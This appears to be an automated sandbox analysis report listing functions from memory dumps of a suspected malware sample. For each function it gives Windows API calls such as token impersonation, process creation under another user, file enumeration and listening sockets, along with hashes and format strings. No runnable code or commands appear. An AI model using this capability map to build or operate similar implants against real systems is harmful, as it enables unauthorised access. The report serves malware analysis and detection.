_errno.LIBCMT ref: 006C1870
_invalid_parameter_noinfo.LIBCMT ref: 006C187B

Strings

, xrefs: 006C1533
@, xrefs: 006C0F0F

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: _errnowrite_multi_charwrite_string$Locale_invalid_parameter_noinfowrite_char$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
String ID: $@
API String ID: 3318157856-1077428164
Opcode ID: aca5eff7b48e60a8575da89cd2ec2425052cdd0f99735d1b91aa5be48c8f36fa
Instruction ID: ea1b22895727e22a2d1ac0bcfddb482025d5b4bd16d0ec8d0c295b4bc75562bc
Opcode Fuzzy Hash: aca5eff7b48e60a8575da89cd2ec2425052cdd0f99735d1b91aa5be48c8f36fa
Instruction Fuzzy Hash: 15422472608B9486EB28CB16D444BBE7BA7F743784F68400EDE4A5FB56DB38C941CB40

Function 006C03DC Relevance: 35.7, APIs: 19, Strings: 1, Instructions: 687COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 006C043D

Part of subcall function 006BF454: _getptd.LIBCMT ref: 006BF46A
Part of subcall function 006BF454: __updatetlocinfo.LIBCMT ref: 006BF49F
Part of subcall function 006BF454: __updatetmbcinfo.LIBCMT ref: 006BF4C6

_errno.LIBCMT ref: 006C0442

Part of subcall function 006BFBCC: _getptd_noexit.LIBCMT ref: 006BFBD0

_fileno.LIBCMT ref: 006C046F

Part of subcall function 006C3914: _errno.LIBCMT ref: 006C391D
Part of subcall function 006C3914: _invalid_parameter_noinfo.LIBCMT ref: 006C3928

write_multi_char.LIBCMT ref: 006C0A9F
write_string.LIBCMT ref: 006C0ABC
write_multi_char.LIBCMT ref: 006C0AD9
write_string.LIBCMT ref: 006C0B38
write_string.LIBCMT ref: 006C0B6F
write_multi_char.LIBCMT ref: 006C0B91
free.LIBCMT ref: 006C0BA5
_isleadbyte_l.LIBCMT ref: 006C0C76
write_char.LIBCMT ref: 006C0C8C
write_char.LIBCMT ref: 006C0CAD
_errno.LIBCMT ref: 006C0DA7
_invalid_parameter_noinfo.LIBCMT ref: 006C0DB2

Strings

, xrefs: 006C0A73

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: _errnowrite_multi_charwrite_string$Locale_invalid_parameter_noinfowrite_char$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
String ID:
API String ID: 3318157856-3916222277
Opcode ID: 442108010190e59218a5984551b34ec8e46758b4fb98f8e7cd36874cc15003ad
Instruction ID: 67f3837c05033f04f4566c9db6271bf7e719f925e55a21122640808998c6f0a9
Opcode Fuzzy Hash: 442108010190e59218a5984551b34ec8e46758b4fb98f8e7cd36874cc15003ad
Instruction Fuzzy Hash: 90324272608784C6FB28CB59D444BBE7BA3FB81B88F24510EDE4A57B59DB39D941CB00

Function 035302D7 Relevance: 30.8, APIs: 15, Strings: 2, Instructions: 1030COMMON

Download Yara Rule

APIs

Part of subcall function 0352E89B: _getptd.LIBCMT ref: 0352E8B1
Part of subcall function 0352E89B: __updatetlocinfo.LIBCMT ref: 0352E8E6
Part of subcall function 0352E89B: __updatetmbcinfo.LIBCMT ref: 0352E90D

_errno.LIBCMT ref: 0353033D

Part of subcall function 0352F013: _getptd_noexit.LIBCMT ref: 0352F017

_fileno.LIBCMT ref: 0353036A

Part of subcall function 03532D5B: _errno.LIBCMT ref: 03532D64
Part of subcall function 03532D5B: _invalid_parameter_noinfo.LIBCMT ref: 03532D6F

write_multi_char.LIBCMT ref: 035309A6
write_string.LIBCMT ref: 035309C3
write_multi_char.LIBCMT ref: 035309E0
write_string.LIBCMT ref: 03530A3F
write_multi_char.LIBCMT ref: 03530A98
free.LIBCMT ref: 03530AAC
_isleadbyte_l.LIBCMT ref: 03530B7D
write_char.LIBCMT ref: 03530B93
write_char.LIBCMT ref: 03530BB4
_errno.LIBCMT ref: 03530CB7
_invalid_parameter_noinfo.LIBCMT ref: 03530CC2

Strings

@, xrefs: 03530356
, xrefs: 0353097A

Memory Dump Source

Source File: 00000000.00000002.4147925142.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3510000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: _errnowrite_multi_char$_invalid_parameter_noinfowrite_charwrite_string$__updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
String ID: $@
API String ID: 3613058218-1077428164
Opcode ID: 378339f2bfa88e71ac19cea4aeeb69c74ed1450f75d131b3461b833e448d52f1
Instruction ID: 6bfe49f3fa32e44ed61b0b69a34a8efeda73becb4d97efeea183740c38c4fb9f
Opcode Fuzzy Hash: 378339f2bfa88e71ac19cea4aeeb69c74ed1450f75d131b3461b833e448d52f1
Instruction Fuzzy Hash: 4A52E731918B498ADB2CDB5CF4552BAB7E5FB97310F28462DD8C7C72E1DA34D8428782

Function 0352F823 Relevance: 29.0, APIs: 15, Strings: 1, Instructions: 1022COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0352E89B: _getptd.LIBCMT ref: 0352E8B1
Part of subcall function 0352E89B: __updatetlocinfo.LIBCMT ref: 0352E8E6
Part of subcall function 0352E89B: __updatetmbcinfo.LIBCMT ref: 0352E90D

_errno.LIBCMT ref: 0352F889

Part of subcall function 0352F013: _getptd_noexit.LIBCMT ref: 0352F017

_fileno.LIBCMT ref: 0352F8B6

Part of subcall function 03532D5B: _errno.LIBCMT ref: 03532D64
Part of subcall function 03532D5B: _invalid_parameter_noinfo.LIBCMT ref: 03532D6F

write_multi_char.LIBCMT ref: 0352FEE6
write_string.LIBCMT ref: 0352FF03
write_multi_char.LIBCMT ref: 0352FF20
write_string.LIBCMT ref: 0352FF7F
write_multi_char.LIBCMT ref: 0352FFD8
free.LIBCMT ref: 0352FFEC
_isleadbyte_l.LIBCMT ref: 035300BD
write_char.LIBCMT ref: 035300D3
write_char.LIBCMT ref: 035300F4
_errno.LIBCMT ref: 035301EE
_invalid_parameter_noinfo.LIBCMT ref: 035301F9

Strings

, xrefs: 0352FEBA

Memory Dump Source

Source File: 00000000.00000002.4147925142.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3510000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: _errnowrite_multi_char$_invalid_parameter_noinfowrite_charwrite_string$__updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
String ID:
API String ID: 3613058218-3916222277
Opcode ID: ab974c686d4cf2a6d6f964f9f08ddbfde3681fa99218c6095000c369d33f032e
Instruction ID: 6b7c8afcd60d6b0a72a18135980ee5cb84d8de50601117486854146c0ae7cec7
Opcode Fuzzy Hash: ab974c686d4cf2a6d6f964f9f08ddbfde3681fa99218c6095000c369d33f032e
Instruction Fuzzy Hash: 8F521731918B598ADB2CCB1CF8506B9BBF5FB97310F68462DD887C31E2D634D8428782

Function 006B61C0 Relevance: 26.0, APIs: 10, Strings: 7, Instructions: 545COMMONLIBRARYCODE

Download Yara Rule

APIs

_snprintf.LIBCMT ref: 006B63EE
_snprintf.LIBCMT ref: 006B640B
_snprintf.LIBCMT ref: 006B632D

Part of subcall function 006BD57C: _errno.LIBCMT ref: 006BD5B3
Part of subcall function 006BD57C: _invalid_parameter_noinfo.LIBCMT ref: 006BD5BE

_snprintf.LIBCMT ref: 006B6660
_snprintf.LIBCMT ref: 006B69BC

Strings

?%s, xrefs: 006B68DF
?%s=%s, xrefs: 006B63E2
%s&%s=%s, xrefs: 006B63FF
%s%s: %s, xrefs: 006B631C
%s%s, xrefs: 006B675F
%s%s, xrefs: 006B664F, 006B6679, 006B681D, 006B69AE
%s&%s, xrefs: 006B68F2

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: _snprintf$_errno_invalid_parameter_noinfo
String ID: %s%s$%s%s$%s%s: %s$%s&%s$%s&%s=%s$?%s$?%s=%s
API String ID: 3442832105-1222817042
Opcode ID: 1f56280164754b5557220eac88cc4c9762102babc9b28307cf2a7c73b7346fc6
Instruction ID: a4640e40d1e7c54bfa49cfded1e75587e09938984853f2e4726a9ca2ca01d2d1
Opcode Fuzzy Hash: 1f56280164754b5557220eac88cc4c9762102babc9b28307cf2a7c73b7346fc6
Instruction Fuzzy Hash: 0C32B4E2614E8592EB259F2DE0012E9A3B1FF99799F045101EF8917B21FF38D2E6C744

Function 006B0F28 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 150filetimeCOMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 006B0F5B

Part of subcall function 006BD1C8: _FF_MSGBANNER.LIBCMT ref: 006BD1F8
Part of subcall function 006BD1C8: _NMSG_WRITE.LIBCMT ref: 006BD202
Part of subcall function 006BD1C8: HeapAlloc.KERNEL32 ref: 006BD21D
Part of subcall function 006BD1C8: _callnewh.LIBCMT ref: 006BD236
Part of subcall function 006BD1C8: _errno.LIBCMT ref: 006BD241
Part of subcall function 006BD1C8: _errno.LIBCMT ref: 006BD24C

Part of subcall function 006ACFCC: malloc.LIBCMT ref: 006ACFDF

Part of subcall function 006ACFFC: htonl.WS2_32 ref: 006AD007

GetCurrentDirectoryA.KERNEL32 ref: 006B0FD3
FindFirstFileA.KERNEL32 ref: 006B100C
GetLastError.KERNEL32 ref: 006B101B
free.LIBCMT ref: 006B1056
free.LIBCMT ref: 006B1063

Part of subcall function 006BD188: HeapFree.KERNEL32 ref: 006BD19E
Part of subcall function 006BD188: _errno.LIBCMT ref: 006BD1A8
Part of subcall function 006BD188: GetLastError.KERNEL32 ref: 006BD1B0

FileTimeToSystemTime.KERNEL32 ref: 006B1070
SystemTimeToTzSpecificLocalTime.KERNEL32 ref: 006B1081
FindNextFileA.KERNEL32 ref: 006B113E
FindClose.KERNEL32 ref: 006B114F

Strings

%s, xrefs: 006B0FF1
.\*, xrefs: 006B0FB7
D0%02d/%02d/%02d %02d:%02d:%02d%s, xrefs: 006B10C3
F%I64d%02d/%02d/%02d %02d:%02d:%02d%s, xrefs: 006B1121

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: Time$FileFind_errno$ErrorHeapLastSystemfreemalloc$AllocCloseCurrentDirectoryFirstFreeLocalNextSpecific_callnewhhtonl
String ID: %s$.\*$D0%02d/%02d/%02d %02d:%02d:%02d%s$F%I64d%02d/%02d/%02d %02d:%02d:%02d%s
API String ID: 723279517-1754256099
Opcode ID: dd787fa29133a0fd75daa2a63f366151dc49c673a2593fbac1e01e080f930c93
Instruction ID: 4371fbad43288643517ee58498e906f5305b7fe81aca367488d137a0575b3d9d
Opcode Fuzzy Hash: dd787fa29133a0fd75daa2a63f366151dc49c673a2593fbac1e01e080f930c93
Instruction Fuzzy Hash: C651F27270479196EB50EF62E8403DEB7A2F785B90F40401AEE4A47B58EF7DC54ACB04

Function 006B0240 Relevance: 18.2, APIs: 12, Instructions: 157processCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateProcessAsUserA.ADVAPI32 ref: 006B029B
GetLastError.KERNEL32 ref: 006B02A9
GetLastError.KERNEL32 ref: 006B02CD

Part of subcall function 006AFA80: MultiByteToWideChar.KERNEL32 ref: 006AFAAD
Part of subcall function 006AFA80: MultiByteToWideChar.KERNEL32 ref: 006AFAD5

CreateProcessA.KERNEL32 ref: 006B031F
GetLastError.KERNEL32 ref: 006B0329
GetCurrentDirectoryW.KERNEL32 ref: 006B0679
GetCurrentDirectoryW.KERNEL32 ref: 006B0693
CreateProcessWithTokenW.ADVAPI32 ref: 006B06D7

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: CreateErrorLastProcess$ByteCharCurrentDirectoryMultiWide$TokenUserWith
String ID:
API String ID: 3044875250-0
Opcode ID: ef855b0e09373d15b0c2c3b2916aafe651afc16b624a92ab55f267427aaf5471
Instruction ID: 02b7eb59746fdd8b095d060c485883c491ec4cef2e74084b6362a84114b640cf
Opcode Fuzzy Hash: ef855b0e09373d15b0c2c3b2916aafe651afc16b624a92ab55f267427aaf5471
Instruction Fuzzy Hash: 85618BB2B14B4087FB609F21E44439E77A2F788B98F11452ADA4987B58DF3DC995CB40

Function 006B780C Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 87fileCOMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 006B783B

Part of subcall function 006BD1C8: _FF_MSGBANNER.LIBCMT ref: 006BD1F8
Part of subcall function 006BD1C8: _NMSG_WRITE.LIBCMT ref: 006BD202
Part of subcall function 006BD1C8: HeapAlloc.KERNEL32 ref: 006BD21D
Part of subcall function 006BD1C8: _callnewh.LIBCMT ref: 006BD236
Part of subcall function 006BD1C8: _errno.LIBCMT ref: 006BD241
Part of subcall function 006BD1C8: _errno.LIBCMT ref: 006BD24C

_snprintf.LIBCMT ref: 006B7853

Part of subcall function 006BD57C: _errno.LIBCMT ref: 006BD5B3
Part of subcall function 006BD57C: _invalid_parameter_noinfo.LIBCMT ref: 006BD5BE

FindFirstFileA.KERNEL32 ref: 006B785E
free.LIBCMT ref: 006B786A

Part of subcall function 006BD188: HeapFree.KERNEL32 ref: 006BD19E
Part of subcall function 006BD188: _errno.LIBCMT ref: 006BD1A8
Part of subcall function 006BD188: GetLastError.KERNEL32 ref: 006BD1B0

malloc.LIBCMT ref: 006B78BA
_snprintf.LIBCMT ref: 006B78D2
free.LIBCMT ref: 006B78FA
FindNextFileA.KERNEL32 ref: 006B7913
FindClose.KERNEL32 ref: 006B7924

Strings

%s\*, xrefs: 006B7840

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: _errno$Find$FileHeap_snprintffreemalloc$AllocCloseErrorFirstFreeLastNext_callnewh_invalid_parameter_noinfo
String ID: %s\*
API String ID: 2620626937-766152087
Opcode ID: b766a1522dcccdc6d8e5ae5440176dc1c71bb58c3c2772cf12c04a584ca98bc8
Instruction ID: 30aebf2e579ace8cd97a782e36dd786bf262c81445aece1e4718d3c40ffe4162
Opcode Fuzzy Hash: b766a1522dcccdc6d8e5ae5440176dc1c71bb58c3c2772cf12c04a584ca98bc8
Instruction Fuzzy Hash: 04312B917082C145FA59AB236C243F96B23B78AFD0F889112DEE50F756DE3DC4A2D704

Function 00401A70 Relevance: 12.0, APIs: 8, Instructions: 50COMMON

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00401A84
RtlLookupFunctionEntry.KERNEL32 ref: 00401A9B
RtlVirtualUnwind.KERNEL32 ref: 00401ADD
SetUnhandledExceptionFilter.KERNEL32 ref: 00401B21
UnhandledExceptionFilter.KERNEL32 ref: 00401B2E
GetCurrentProcess.KERNEL32 ref: 00401B34
TerminateProcess.KERNEL32 ref: 00401B42
abort.MSVCRT ref: 00401B48

Memory Dump Source

Source File: 00000000.00000002.4147472908.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4147461082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147472908.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147501523.000000000040D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147512918.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147525678.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_THsSNYblMw.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentEntryFunctionLookupTerminateUnwindVirtualabort
String ID:
API String ID: 4278921479-0
Opcode ID: 27e43dfa7ef0e7d63c314b0127c2fc61b110ad3033d9dc91a01dad9a926d3ef7
Instruction ID: cf336b0ec7d2cb6baae35a739632777ca23f94a65b3f666190a75c6fcbb7d788
Opcode Fuzzy Hash: 27e43dfa7ef0e7d63c314b0127c2fc61b110ad3033d9dc91a01dad9a926d3ef7
Instruction Fuzzy Hash: B5210FB5202F45E9EB009B61F98438A33B4BB08B88F40452ADF8E27775EF38C519C708

Function 006B5100 Relevance: 9.1, APIs: 6, Instructions: 60networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 006B5138
htons.WS2_32 ref: 006B5158
ioctlsocket.WS2_32 ref: 006B5174
closesocket.WS2_32 ref: 006B5182
bind.WS2_32 ref: 006B5195
listen.WS2_32 ref: 006B51A5

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: bindclosesockethtonsioctlsocketlistensocket
String ID:
API String ID: 1767165869-0
Opcode ID: 00106a6ad1e19a2568f5e355a5f7b5f41c24474b7da708c1ecfc5d75562f020d
Instruction ID: 7d3be0428661e563fa3883b75cf629986f569f754e3a006003822a6f0b1478b0
Opcode Fuzzy Hash: 00106a6ad1e19a2568f5e355a5f7b5f41c24474b7da708c1ecfc5d75562f020d
Instruction Fuzzy Hash: C011E272704B9482EB249F1AE8103ADB763F788FA4F990625DE6B07754CF3DD8958B04

Function 006B4CF8 Relevance: 9.1, APIs: 6, Instructions: 57networkCOMMON

Download Yara Rule

APIs

htonl.WS2_32 ref: 006B4D20
htons.WS2_32 ref: 006B4D2C
socket.WS2_32 ref: 006B4D44
closesocket.WS2_32 ref: 006B4D56
bind.WS2_32 ref: 006B4D83
ioctlsocket.WS2_32 ref: 006B4D9D

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: bindclosesockethtonlhtonsioctlsocketsocket
String ID:
API String ID: 3910169428-0
Opcode ID: e5609d3337b011382687551e59e102a1dae304545505bb00b23c1231bff3c0b8
Instruction ID: 36791a4ef431c44594eb72ec10a61f66280e532e5bfaff6f628a11d3f4d23c3f
Opcode Fuzzy Hash: e5609d3337b011382687551e59e102a1dae304545505bb00b23c1231bff3c0b8
Instruction Fuzzy Hash: 4811D076710B4086E754AF21F4143D93B62FB88BA4F54432ACE6A43391DF3DC99ACB44

Function 006BBEF0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 006BBC70: RevertToSelf.ADVAPI32 ref: 006BBC8D

LogonUserA.ADVAPI32 ref: 006BBF38
GetLastError.KERNEL32 ref: 006BBF42

Part of subcall function 006B473C: malloc.LIBCMT ref: 006B4758

Part of subcall function 006AFA80: MultiByteToWideChar.KERNEL32 ref: 006AFAAD
Part of subcall function 006AFA80: MultiByteToWideChar.KERNEL32 ref: 006AFAD5

Part of subcall function 006ACFCC: malloc.LIBCMT ref: 006ACFDF

ImpersonateLoggedOnUser.ADVAPI32 ref: 006BBF60
GetLastError.KERNEL32 ref: 006BBF6A

Strings

%s\%s, xrefs: 006BC024

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: ByteCharErrorLastMultiUserWidemalloc$ImpersonateLoggedLogonRevertSelf
String ID: %s\%s
API String ID: 3621627092-4073750446
Opcode ID: ce1ddc4cc406a6b86e948808d9d577ee996a93c47919ca10f4bbc8531711b80e
Instruction ID: 585d1739fb513eaba59bc4351a5d33f1387fbe444cabad5cba89f73b6ee9c69a
Opcode Fuzzy Hash: ce1ddc4cc406a6b86e948808d9d577ee996a93c47919ca10f4bbc8531711b80e
Instruction Fuzzy Hash: BC317E64718B8086FB40EB62F85439B3363EB89FC0F506029EA4E47B56DF7EC5958B44

Function 006AF654 Relevance: 7.6, APIs: 5, Instructions: 61sleepCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 006AF675
Sleep.KERNEL32 ref: 006AF6E4
GetTickCount.KERNEL32 ref: 006AF6EA
Sleep.KERNEL32 ref: 006AF703
closesocket.WS2_32 ref: 006AF70C

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: CountSleepTick$closesocket
String ID:
API String ID: 2363407838-0
Opcode ID: 33db7c2da52236c42fae74785d1bcb7574fb57a2df4d5ea3a285f2db53541465
Instruction ID: 975c43cee9ecce67c4991eab108c8b787ec11aaaf30309ba5d8369abaea08e6a
Opcode Fuzzy Hash: 33db7c2da52236c42fae74785d1bcb7574fb57a2df4d5ea3a285f2db53541465
Instruction Fuzzy Hash: D011F32170068482DA50FBA2F45435EA392F786BF0F444729EEBE437E5DE3CCA468B05

Function 00401990 Relevance: 7.6, APIs: 5, Instructions: 56timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 004019D5
GetCurrentProcessId.KERNEL32 ref: 004019E0
GetCurrentThreadId.KERNEL32 ref: 004019E8
GetTickCount.KERNEL32 ref: 004019F0
QueryPerformanceCounter.KERNEL32 ref: 004019FE

Memory Dump Source

Source File: 00000000.00000002.4147472908.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4147461082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147472908.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147501523.000000000040D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147512918.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147525678.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_THsSNYblMw.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 180d7ae7fc5b59493381c36575e32c3318445472d573a77b1124f7da9349a765
Instruction ID: 088ae4e322ac71afa1741572681cd55a149c1471ea95f8004f9c9491386c013f
Opcode Fuzzy Hash: 180d7ae7fc5b59493381c36575e32c3318445472d573a77b1124f7da9349a765
Instruction Fuzzy Hash: AA1170A6756B1092FB209B25F90431973A0B788BF4F081A759F9D53BB4DA3CC986C708

Function 006BCE10 Relevance: 7.6, APIs: 5, Instructions: 53networkCOMMONLIBRARYCODE

Download Yara Rule

APIs

socket.WS2_32 ref: 006BCE45
closesocket.WS2_32 ref: 006BCE57
htons.WS2_32 ref: 006BCE68
bind.WS2_32 ref: 006BCE89
listen.WS2_32 ref: 006BCE9E

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: bindclosesockethtonslistensocket
String ID:
API String ID: 564772725-0
Opcode ID: 693a9b11f937d3efc85ee89bf6cc7c32527a322075b8e36231fcd70ee6315e40
Instruction ID: 36bc54130efc615d2ea879bb49d57800dddbdcf58382f9d7838dd0d15c317e0d
Opcode Fuzzy Hash: 693a9b11f937d3efc85ee89bf6cc7c32527a322075b8e36231fcd70ee6315e40
Instruction Fuzzy Hash: 0811E26671079482EA20AF12E41535AB762FB84FF4F440626EEA947B94CF3DC596CB04

